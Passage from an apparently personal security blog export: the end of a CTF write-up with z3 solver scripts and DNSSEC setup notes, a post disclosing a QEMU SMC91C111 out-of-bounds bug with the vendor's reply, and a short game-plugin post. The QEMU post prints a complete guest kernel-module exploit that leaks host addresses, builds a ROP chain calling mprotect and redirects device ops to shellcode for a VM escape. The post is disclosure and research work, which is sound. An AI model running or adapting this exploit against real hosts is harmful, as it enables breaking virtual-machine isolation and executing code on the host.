m[sym], y)</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> val: <span class="built_in">chr</span>(<span class="built_in">int</span>(<span class="built_in">str</span>(val))), flag) <span class="comment"># wtf</span></span><br><span class="line"> <span class="built_in">print</span> <span class="built_in">len</span>(flag)</span><br><span class="line"> <span class="built_in">print</span> <span class="string">''</span>.join(flag)</span><br></pre></td></tr></table></figure>
<h2 id="LostKey"><a href="#LostKey" class="headerlink" title="LostKey"></a>LostKey</h2><p>4 processes created by clone, shared memory. When the program init, some rops will be filled in each process’s stack, and the rops are the thing that check your flag.</p>
<p>anti-debug will be used in perior 3 processes, and generate the key to decode the input in thread 4.</p>
<p>So just track the right rops to get the algorithm. And write some scripts to calculate the flag.</p>
<h1 id="Web-Rev"><a href="#Web-Rev" class="headerlink" title="Web,Rev"></a>Web,Rev</h1><h2 id="Triangle"><a href="#Triangle" class="headerlink" title="Triangle"></a>Triangle</h2><p>Use chrome to decode the ARM binary code, we got two function, encode and test. Write a script to solve the problem.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> z3</span><br><span class="line"></span><br><span class="line">x = [z3.BitVec(i, <span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>)]</span><br><span class="line">y = [<span class="number">0</span>] * <span class="number">32</span></span><br><span class="line">s = z3.Solver()</span><br><span class="line"></span><br><span class="line">a = <span class="string">"XYzaSAAX_PBssisodjsal_sSUVWZYYYb"</span></span><br><span class="line">b = <span class="built_in">map</span>(<span class="built_in">ord</span>, a)</span><br><span class="line"></span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> ch = x[i]</span><br><span class="line"> ch = z3.If(flag == <span class="number">1</span>, ch + (i & <span class="number">3</span>), ch)</span><br><span class="line"> temp = ch + <span class="number">6</span></span><br><span class="line"> flag = temp & <span class="number">1</span></span><br><span class="line"> y[i] = temp</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> ch = y[i] + <span class="number">5</span></span><br><span class="line"> <span class="keyword">if</span> i & <span class="number">1</span>:</span><br><span class="line"> ch = y[i] + <span class="number">2</span></span><br><span class="line"> s.add(ch == b[i])</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> s.check() == z3.sat:</span><br><span class="line"> m = s.model()</span><br><span class="line"> <span class="built_in">print</span> m</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> sym: m[sym], x)</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> val: <span class="built_in">chr</span>(<span class="built_in">int</span>(<span class="built_in">str</span>(val))), flag) <span class="comment"># wtf</span></span><br><span class="line"> <span class="built_in">print</span> <span class="string">''</span>.join(flag)</span><br></pre></td></tr></table></figure>
<h1 id="Misc-Web"><a href="#Misc-Web" class="headerlink" title="Misc, Web"></a>Misc, Web</h1><h2 id="DnSoSecure"><a href="#DnSoSecure" class="headerlink" title="DnSoSecure"></a>DnSoSecure</h2><p>source audit, download the source.zip<br>git log and checkout last branch</p>
<p>get private and public key for setting up DNSSEC server.</p>
<p>ref:<a href="https://www.digitalocean.com/community/tutorials/how-to-setup-dnssec-on-an-authoritative-bind-dns-server--2">https://www.digitalocean.com/community/tutorials/how-to-setup-dnssec-on-an-authoritative-bind-dns-server--2</a></p>
<p>named.conf.default-zone</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">zone "otherside.earth.flux"{</span><br><span class="line"> type master;</span><br><span class="line"> file "/etc/bind/master/otherside.earth.flux.db.signed";</span><br><span class="line"> allow-update { none; };</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>otherside.earth.flux.db</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$TTL 3600</span><br><span class="line">@ IN SOA ns1.otherside.earth.flux. root.otherside.earth.flux. (</span><br><span class="line"> 2014072202; Serial</span><br><span class="line"> 3600 ; Refresh</span><br><span class="line"> 86400 ; Retry</span><br><span class="line"> 2419200 ; Expire</span><br><span class="line"> 604800 ) ; Negative Cache TTL</span><br><span class="line">;</span><br><span class="line">@ IN A 127.0.0.1</span><br><span class="line">@ IN NS ns1.earth.flux.</span><br><span class="line">ns1 IN A 127.0.0.1</span><br><span class="line">$INCLUDE Kotherside.earth.flux.+007+11537.key</span><br><span class="line">$INCLUDE Kotherside.earth.flux.+007+26883.key</span><br></pre></td></tr></table></figure>
<p>use this command to sign and gen RRSIG</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dnssec-signzone -A -3 $(head -c 1000 /dev/random | sha1sum | cut -b 1-16) -N INCREMENT -o otherside.earth.flux. -t otherside.earth.flux.db</span><br></pre></td></tr></table></figure>
<p>use <code>rndc reload</code> to reload bind9 config</p>
<p>CAUTION: The file name must be like this</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Kotherside.earth.flux.+007+11537.key Kotherside.earth.flux.+007+26883.key dsset-otherside.earth.flux. otherside.earth.flux.db.signed</span><br><span class="line">Kotherside.earth.flux.+007+11537.private Kotherside.earth.flux.+007+26883.private otherside.earth.flux.db</span><br></pre></td></tr></table></figure>
<p>same as zone name. It’s important.</p>
<p><code>sudo apt install rng-tools</code> to speed up sign progress</p>
2017-10-19T09:23:47.000Z
https://azure.kdays.cn/2017/08/22/A-qemu-escape-SMC911-exploit/
A qemu escape - SMC911 exploit
<p>中午整理Macbook硬盘的时候发现了这个半年前看到的然而并没有要来CVE号的漏洞。<br>嗯、反正也修了半年了,放个exploit……感谢白兔师傅和谢大哥的帮助。纪念那段从来没有挖到过qemu CVE的时光……</p>
<span id="more"></span>
<p>Mail</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Hello Azure,</span><br><span class="line"></span><br><span class="line">On Mon, 24 Oct 2016 09:02:19 GMT, azureyang# wrote:</span><br><span class="line">> I found a OOB read/write bug that can cause code execution on host.</span><br><span class="line">> The relation code is in</span><br><span class="line">> hw/net/smc91c111.c:447</span><br><span class="line">> s->data[n][p] = value;</span><br><span class="line">> hw/net/smc91c111.c:553</span><br><span class="line">> return s->data[n][p];</span><br><span class="line">></span><br><span class="line">> failed to check the border of the passed value, the packet_num and ptr</span><br><span class="line">> can be set by guest mmio operations. With the overwrite of s->mmio-</span><br><span class="line">> >ops, code execution can be achieved.</span><br><span class="line"></span><br><span class="line">Thank you so much for reporting this issue. A patch has been sent upstream to fix this issue.</span><br><span class="line"></span><br><span class="line">IIUC, the SMSC91C111 ethernet controller is used on the ARM Versatile EP and other similar platforms. Which are mostly used in the prototype development environments. These platforms are not generally used with KVM to provide virtualised guest environments. We could not consider this issue for a CVE as the upstream Qemu project does not consider these issues to be security relevant.</span><br><span class="line"></span><br><span class="line">Please see:</span><br><span class="line">-></span><br><span class="line">http://wiki.qemu.org/SecurityProcess#How_impact_and_severity_of_a_bug_is_decided</span><br><span class="line"></span><br><span class="line">Thank you so much!</span><br><span class="line">---</span><br><span class="line">Prasad J Pandit / Red Hat Product Security</span><br></pre></td></tr></table></figure>
<p>exploit</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><linux/module.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><linux/slab.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SMC911_BASE (unsigned char *)0xd09a6000</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">write_on</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> addr[<span class="number">14</span>] = <span class="number">2</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_addr</span><span class="params">(<span class="type">uint64_t</span> offset)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> <span class="type">uint64_t</span> ptr = offset%<span class="number">0x800</span>;</span><br><span class="line"> addr[<span class="number">2</span>] = offset/<span class="number">0x800</span>;</span><br><span class="line"> addr[<span class="number">6</span>] = ptr&<span class="number">0xff</span>;</span><br><span class="line"> addr[<span class="number">7</span>] = ptr>><span class="number">8</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_uint8</span><span class="params">(<span class="type">uint64_t</span> offset,<span class="type">uint8_t</span> value)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> addr[<span class="number">8</span>] = value;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_uint16</span><span class="params">(<span class="type">uint64_t</span> offset,<span class="type">uint16_t</span> value)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> *(<span class="type">uint16_t</span> *)&addr[<span class="number">8</span>] = value;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_uint32</span><span class="params">(<span class="type">uint64_t</span> offset,<span class="type">uint32_t</span> value)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>] = value;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_uint64</span><span class="params">(<span class="type">uint64_t</span> offset,<span class="type">uint64_t</span> value)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>] = value&<span class="number">0xFFFFFFFF</span>;</span><br><span class="line"> set_addr(offset+<span class="number">4</span>);</span><br><span class="line"> *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>] = value>><span class="number">32</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_memset</span><span class="params">(<span class="type">uint64_t</span> offset,<span class="type">uint64_t</span> value,<span class="type">uint64_t</span> cbmem)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">uint64_t</span> i = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>;i<cbmem;i+=<span class="number">8</span>)</span><br><span class="line"> {</span><br><span class="line"> set_uint64(offset+i,value);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">set_memcpy</span><span class="params">(<span class="type">uint64_t</span> dst_offset,<span class="type">void</span> * src,<span class="type">uint64_t</span> cbmem)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">uint8_t</span> * uc_src = (<span class="type">uint8_t</span>*)src; </span><br><span class="line"> <span class="type">uint64_t</span> i = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>;i<cbmem;i+=<span class="number">8</span>)</span><br><span class="line"> {</span><br><span class="line"> set_uint64(dst_offset+i,*(<span class="type">uint64_t</span> *)(uc_src+i));</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">uint8_t</span> <span class="title function_">get_uint8</span><span class="params">(<span class="type">uint64_t</span> offset)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> <span class="keyword">return</span> addr[<span class="number">8</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">uint16_t</span> <span class="title function_">get_uint16</span><span class="params">(<span class="type">uint64_t</span> offset)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> <span class="keyword">return</span> *(<span class="type">uint16_t</span> *)&addr[<span class="number">8</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">uint32_t</span> <span class="title function_">get_uint32</span><span class="params">(<span class="type">uint64_t</span> offset)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> <span class="keyword">return</span> *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">uint64_t</span> <span class="title function_">get_uint64</span><span class="params">(<span class="type">uint64_t</span> offset)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"> <span class="type">uint64_t</span> low = <span class="number">0</span>,high = <span class="number">0</span>;</span><br><span class="line"> set_addr(offset);</span><br><span class="line"> low = *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>];</span><br><span class="line"> set_addr(offset+<span class="number">4</span>);</span><br><span class="line"> high = *(<span class="type">uint32_t</span> *)&addr[<span class="number">8</span>];</span><br><span class="line"> <span class="keyword">return</span> (<span class="type">uint64_t</span>)high<<<span class="number">32</span> | low;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic,model=smc91c111 -net user</span></span><br><span class="line"><span class="comment">//mprotect 0x7f11879a2eb0</span></span><br><span class="line"><span class="comment">//libcdata 0x7f1187c65b78</span></span><br><span class="line"><span class="comment">//delta = 0x2c2cc8</span></span><br><span class="line"><span class="comment">//offset = 0x2764</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">smc_test</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">char</span> * addr = SMC911_BASE;</span><br><span class="line"></span><br><span class="line"> <span class="type">uint64_t</span> rop [] = {</span><br><span class="line"> <span class="number">0x00000000006bc31c</span>,<span class="comment">//pop rdi; ret;</span></span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="number">0x000000000052ac4c</span>,<span class="comment">//pop rsi; ret;</span></span><br><span class="line"> <span class="number">0x10000</span>,</span><br><span class="line"> <span class="number">0x0000000000517ea5</span>,<span class="comment">//pop rdx; ret;</span></span><br><span class="line"> <span class="number">0x0000000000000007</span>,<span class="comment">//RWE</span></span><br><span class="line"> <span class="number">0x7f6a14afbeb0</span>,<span class="comment">//mprotect</span></span><br><span class="line"> <span class="number">0x000000000052ac4c</span>,<span class="comment">//pop rsi; ret;</span></span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"> <span class="number">0x00bc5c1b</span><span class="comment">//jmp rsi;</span></span><br><span class="line"> };</span><br><span class="line"> <span class="type">uint32_t</span> original_ops = <span class="number">0</span>, card_base = <span class="number">0</span>,data_offset=<span class="number">0x2384</span>;</span><br><span class="line"> <span class="type">uint64_t</span> main_arena = <span class="number">0</span>;</span><br><span class="line"> write_on();</span><br><span class="line"> original_ops = get_uint32(<span class="number">0x43d0</span>-data_offset);</span><br><span class="line"> card_base = get_uint32(<span class="number">0x20b4</span>)<span class="number">-0x4430</span>;</span><br><span class="line"></span><br><span class="line"> printk(<span class="string">"Host card ops = 0x%0X\ncard base:0x%0X\nfake_mmio_ops:0x%0X\n"</span>,original_ops,card_base,card_base+data_offset+<span class="number">0x1800</span>);</span><br><span class="line"> set_memset(<span class="number">0x1800</span>,<span class="number">0</span>,<span class="number">0x80</span>);</span><br><span class="line"> set_uint32(<span class="number">0x1800</span>+<span class="number">1</span>,<span class="number">0x007e29ee</span>);<span class="comment">//pop rsi; pop rsp; ret 0x66ff</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">80</span>,<span class="number">0x6161616162616161</span>);<span class="comment">//readb</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">88</span>,<span class="number">0x6761616168616161</span>);<span class="comment">//readw</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">96</span>,<span class="number">0x6361616164616161</span>);<span class="comment">//readl</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">104</span>,<span class="number">0x696161616a616161</span>);<span class="comment">//writeb</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">112</span>,<span class="number">0x6561616166616161</span>);<span class="comment">//writew</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">120</span>,<span class="number">0x00ba8c41</span>);<span class="comment">//writel;push rdx;call qword ptr [rbx+1]</span></span><br><span class="line"> set_uint64(<span class="number">0x1800</span>+<span class="number">0x80</span>,rop[<span class="number">0</span>]+<span class="number">1</span>);</span><br><span class="line"> main_arena = get_uint64(<span class="number">0x2764</span>);</span><br><span class="line"> rop[<span class="number">1</span>] = card_base&<span class="number">0xFFFFFFFFFFFFF000</span>;</span><br><span class="line"> rop[<span class="number">6</span>] = main_arena - <span class="number">0x2c2cc8</span>;</span><br><span class="line"> rop[<span class="number">8</span>] = card_base+data_offset+<span class="number">0x1888</span>;</span><br><span class="line"> set_memcpy(<span class="number">0x1800</span>+<span class="number">0x66FF</span>+<span class="number">0x88</span>,rop,<span class="keyword">sizeof</span>(rop));</span><br><span class="line"> set_memcpy(<span class="number">0x1800</span>+<span class="number">0x88</span>,shellcode,<span class="keyword">sizeof</span>(shellcode));</span><br><span class="line"> set_uint32(<span class="number">0x43d0</span>-data_offset,card_base+data_offset+<span class="number">0x1800</span>);</span><br><span class="line"> *(<span class="type">uint32_t</span> *)&addr[<span class="number">0</span>] = card_base+data_offset+<span class="number">0x1800</span>+<span class="number">0x80</span>;<span class="comment">//boom! Can only write low part to rdx because use 32 bit arm,</span></span><br><span class="line"> <span class="comment">//aarch64 can overwrite mmio->ops->valid->max_access_size and mmio->ops->write to achieve extended register control </span></span><br><span class="line"> <span class="comment">//rsi -> 0-0xf</span></span><br><span class="line"> <span class="comment">//rdx -> 0-0xFFFFFFFF</span></span><br><span class="line"> <span class="comment">//rbx -> controled memory</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">init_module</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">{</span><br><span class="line"> smc_test();</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">cleanup_module</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">{</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
2017-08-21T22:51:47.000Z
https://azure.kdays.cn/2017/08/16/hello-world/
Another new home
<p>umm,之前常年不管理wordpress,然后这玩意漏洞太多了导致坑娘服务器被撸……于是这次干脆直接要来域名在自己服务器上搭建了,因为wordpress臃肿而且漏洞多……所以以后就用hexo了,感觉这个还是挺清新的。以前的东搬不搬的看心情,各位老爷们要是想看以前的内容请直接访问<a href="https://web.archive.org/web/20161224180420/http://azure.kdays.cn/">Internet Archive</a>,以后blog会继续更新。都好几年没写东西了,再不写点感觉自己都废了。</p>
2017-08-16T05:39:24.000Z
https://azure.kdays.cn/2014/02/03/HarmoFavo/
Favorite社通用和谐插件 v0.2【游戏全年龄化
<p>插件下载:<br><a href="/uploads/2014/02/HarmoFavo2.7z">HarmoFavo</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">v0.2[2014.2.19]</span><br><span class="line">[+]全自动配置</span><br><span class="line">v0.11[2014.2.19]</span><br><span class="line">[+]支持Wiz Anniversary、funta支持不能……那玩意章节表比较奇葩、</span><br><span class="line">[+]CG Patch</span><br><span class="line">v0.1 [2014.2.3]</span><br><span class="line">第一个版本</span><br></pre></td></tr></table></figure>
<p>本插件理论上支持所有使用Favorite社游戏引擎的游戏、并且目前已有的3个汉化版全部支持、现在已经支持全自动和谐……您只需要将本插件释放到游戏目录并用AlphaROMdiE装载游戏即可。<br>使用方法:【请在使用前认真阅读!<br>首先确保您的游戏目录是这样的、HarmoFavo下载下去以后直接释放到游戏目录即可<br><img src="/uploads/2014/02/20140202213303.png"><br>上个图证明可以支持光鸟鸟、色鸟鸟也可以支持、方法看评论一楼的回复<br>和谐后的光鸟鸟、其他的图就不上了……那个加奈和澪的3P因为是男猪开脑洞梦到的……所以那个没辙╮( ̄▽ ̄”)╭ 顾及18R的小盆友要玩的时候要小心这个坑。<br><img src="/uploads/2014/02/image1.png"></p>
<span id="more"></span>
<hr>
<p>【这里为老版本的说明、不必阅读】然后打开plugin目录、创建一个文本文档命名为config、然后里面的内容是需要解析的游戏的hcb文件。【为了兼容各种汉化补丁所以没有搞成自动的、搞成自动的兼容性会降低的。然后把那个文件从游戏目录复制到plugin目录下、比如我要让星空的记忆FD汉化版和谐一下,就复制汉化后的脚本执行体hoshimemo_ehchn.bch到plugin目录然后再填写config的内容即可。如下图<br><img src="/uploads/2014/02/20140202211317.png"></p>
<p>然后回到游戏目录、启动AlphaROMdiE、勾选禁止转码、把游戏可执行文件拖到上面、比如汉化版是Hoshimemo_EHchn.exe、然后会生成一个快捷方式、以后从这里点进去就是和谐版的游戏啦~<br><img src="/uploads/2014/02/20140202212758.png"></p>
<p>和谐效果如下图<br><img src="/uploads/2014/02/20140202210709.png"></p>
<p>被屏蔽掉的肯定就是H图啦~<br><img src="/uploads/2014/02/20140202210726.png"></p>
<p>有一个误伤的没办法、后来确认了下那张CG的确是出现在某H情节里……<br><img src="/uploads/2014/02/20140202210740.png"></p>
<p>啧啧啧、看看这有多少H<br><img src="/uploads/2014/02/20140202210750.png"></p>
<p>ETC的内容还是可以全部看到的_(:з」∠)_这里一般不会有H的</p>
<hr>
<p>吐槽时间:<br>_(:з」∠)_这两天戳了下Favorite的引擎、感谢AmaranthF对Favorite社游戏引擎的vm拆解……</p>
<p>hcb可执行体主要分成几个区域</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">———————</span><br><span class="line">public functions</span><br><span class="line">———————</span><br><span class="line">dispatcher</span><br><span class="line">———————</span><br><span class="line">para jumper[optional]</span><br><span class="line">———————</span><br><span class="line">para code</span><br><span class="line">———————</span><br><span class="line">H memo code</span><br><span class="line">———————</span><br></pre></td></tr></table></figure>
<p>目前的做法比较简单粗暴、就是计算一下H memo code起始的地方、如果有call到这里的话直接给ret回去<br>插件关键代码</p>
